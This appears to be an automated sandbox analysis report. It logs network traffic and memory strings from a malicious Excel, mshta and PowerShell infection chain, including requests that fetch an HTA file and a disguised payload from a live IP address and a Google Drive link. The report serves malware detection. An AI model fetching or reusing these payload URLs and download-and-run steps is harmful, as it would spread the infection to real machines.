Source: global traffic HTTP traffic detected: GET /540/createdbestthingswithniceworkgreath.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 23 Oct 2024 03:51:20 GMTConnection: Keep-AliveHost: 192.210.215.8If-None-Match: "20b6a-6251ccc7de906"
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown HTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88E54B18 URLDownloadToFileW, 5_2_000007FE88E54B18
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86CC8246.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.210.215.8If-Range: "20b6a-6251ccc7de906"
Source: global traffic HTTP traffic detected: GET /540/createdbestthingswithniceworkgreath.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 23 Oct 2024 03:51:20 GMTConnection: Keep-AliveHost: 192.210.215.8If-None-Match: "20b6a-6251ccc7de906"
Source: global traffic HTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: u4u.kids
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:40:27 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 299Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 32 31 30 2e 32 31 35 2e 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 192.210.215.8 Port 80</address></body></html>
Source: mshta.exe, 00000004.00000003.427837795.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429202754.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/
Source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/created
Source: powershell.exe, 00000011.00000002.488335048.000000000290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIF
Source: powershell.exe, 00000005.00000002.473584199.000000001A227000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFC
Source: powershell.exe, 00000011.00000002.495821234.000000001AA8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFI
Source: powershell.exe, 00000011.00000002.495821234.000000001AA8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFV
Source: powershell.exe, 00000005.00000002.473584199.000000001A227000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFZ
Source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIFp
Source: mshta.exe, 0000000F.00000002.479518497.0000000003C6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta...
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta//1C:
Source: mshta.exe, 00000004.00000003.427286039.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426419047.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta3
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta5
Source: mshta.exe, 00000004.00000002.429236849.000000000337D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426395539.000000000337C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428101391.000000000337C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta50A%25253Ch
Source: mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta?
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaEM
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaM
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaP
Source: mshta.exe, 0000000F.00000003.467508099.0000000003C67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaP(
Source: mshta.exe, 00000004.00000003.427286039.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426419047.0000000000311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.428563336.0000000000311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htaUC
Source: mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htacepC:
Source: mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htag
Source: mshta.exe, 00000004.00000003.427607890.0000000002565000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470138759.0000000002285000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476638710.0000000002285000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.htahttp://192.210.2
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.usertru
Source: powershell.exe, 00000005.00000002.475447334.000000001C1F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.cr
Source: powershell.exe, 00000005.00000002.458032894.000000000350C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000005.00000002.473261807.0000000012181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479317402.00000000003D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472164443.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003C08000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479481738.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471336990.0000000003C08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000002.429202754.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427837795.000000000331A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.479057196.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477308405.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479334056.000000000041F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477231020.000000000041F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
